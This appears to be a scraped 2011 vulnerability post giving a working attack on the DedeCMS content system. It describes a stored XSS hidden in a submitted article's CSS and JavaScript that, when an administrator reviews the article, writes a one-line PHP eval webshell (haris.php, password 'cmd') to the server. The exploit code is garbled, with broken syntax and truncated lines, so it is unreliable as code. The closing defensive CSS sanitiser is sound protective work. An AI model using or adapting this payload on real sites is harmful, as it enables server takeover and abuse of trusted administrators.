DedeCMS XSS 0day (works across versions), with getshell EXP - Vulnerability Warning - the black bar safety net

ID MYHACK58:62201131026
Type myhack58
Reporter Anonymous
Modified 2011-06-25T00:00:00


Author: haris

Vulnerability cause: the editor's filtering is not strict enough, which allows a malicious script to run.

So far this has only been tested on versions 5.3 to 5.7. Earlier versions are untested; readers can check them themselves.

Here is how it is used.

Three conditions:

  1. Registration is open

  2. Article submission is open

  3. The administrator is diligent and actually reviews submitted articles; this is the weakest part of the whole thing.

Register as a member and publish an article.

Fill the content with:




background-image:url('javascript:document. write("")')


Newxss.js


var request = false;

if(window. XMLHttpRequest) {

request = new XMLHttpRequest();

if(request. overrideMimeType) {

request. overrideMimeType('text/xml');


} else if(window. ActiveXObject) {

var versions = ['Microsoft. XMLHTTP', 'MSXML. XMLHTTP', 'Microsoft. XMLHTTP', 'Msxml2. XMLHTTP. 7. 0','Msxml2. XMLHTTP. 6. 0','Msxml2. XMLHTTP. 5. 0', 'Msxml2. XMLHTTP. 4. 0', 'MSXML2. XMLHTTP. 3. 0', 'MSXML2. XMLHTTP'];

for(var i=0; i try {

request = new ActiveXObject(versions[i]);

} catch(e) {}




function getFolder( url ){

obj = url. split('/')

return obj[obj. length-2]


oUrl = top. location. href;

u = getFolder(oUrl);


function add_admin(){

var url= "/"+u+"/sys_sql_query.php";

var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris. php&str=%3C%3Fphp+eval%2 8%24_POST%5Bcmd%5D%2 9%3F%3E&B1=++%E4%BF%9D+%E5%AD%9 8++";

xmlhttp. open("POST", url, true);

xmlhttp. setRequestHeader("Content-type", "application/x-www-form-urlencoded");

xmlhttp. setRequestHeader("Content-length", params. length);

xmlhttp. setRequestHeader("Connection", "Keep-Alive");

xmlhttp. send(params);


When an administrator reviews this article, a one-line webshell, haris.php, is automatically generated in the data directory. The password is cmd.
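
A defensive counterpart to the cause stated above (an editor filter that lets a `javascript:` URL through inside inline CSS), as an added example that is not part of the original post and not DedeCMS code: a fail-closed sanitiser for `style` values in member-submitted content. The function names and the property allowlist are assumptions.

```javascript
// Added defensive example. ALLOWED_PROPS and all function names are assumptions.
const ALLOWED_PROPS = new Set(['color', 'background-color', 'font-size',
  'font-weight', 'text-align', 'text-decoration']);

// Decode CSS escapes (\6a, \00006A followed by a space, \j) so that
// obfuscated keywords become visible to the checks below.
function decodeCssEscapes(s) {
  const re = /\\([0-9a-fA-F]{1,6})[ \t\r\n\f]?|\\([^\r\n\f0-9a-fA-F])/g;
  return s.replace(re, (m, hex, ch) => {
    if (ch !== undefined) return ch;
    const cp = parseInt(hex, 16);
    return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : '\ufffd';
  });
}

// Canonical form used only for inspection: comments stripped, escapes
// decoded, whitespace and control characters removed, lowercased.
function normalise(value) {
  const noComments = value.replace(/\/\*[\s\S]*?\*\//g, '');
  return decodeCssEscapes(noComments)
    .replace(/[\u0000-\u0020\u007f]/g, '')
    .toLowerCase();
}

// Reject anything that can load or execute content, plus leftover
// backslashes or angle brackets that survived decoding (fail closed).
function isDangerousValue(value) {
  const n = normalise(value);
  return /url\(|expression\(|javascript:|vbscript:|data:|@import|behavior|-moz-binding/.test(n)
    || /[<>\\]/.test(n);
}

// Keep only allowlisted properties whose values pass inspection.
function sanitizeStyle(style) {
  const kept = [];
  for (const decl of style.split(';')) {
    const idx = decl.indexOf(':');
    if (idx < 0) continue;                      // not a declaration
    const prop = decl.slice(0, idx).trim().toLowerCase();
    const value = decl.slice(idx + 1).trim();
    if (!ALLOWED_PROPS.has(prop)) continue;     // unknown property: drop
    if (value === '' || isDangerousValue(value)) continue;
    kept.push(prop + ': ' + value);
  }
  return kept.join('; ');
}
```

The same allowlist-then-inspect logic belongs in the server-side filter that stores the article, so the administrator's review page never renders member-controlled CSS unchecked.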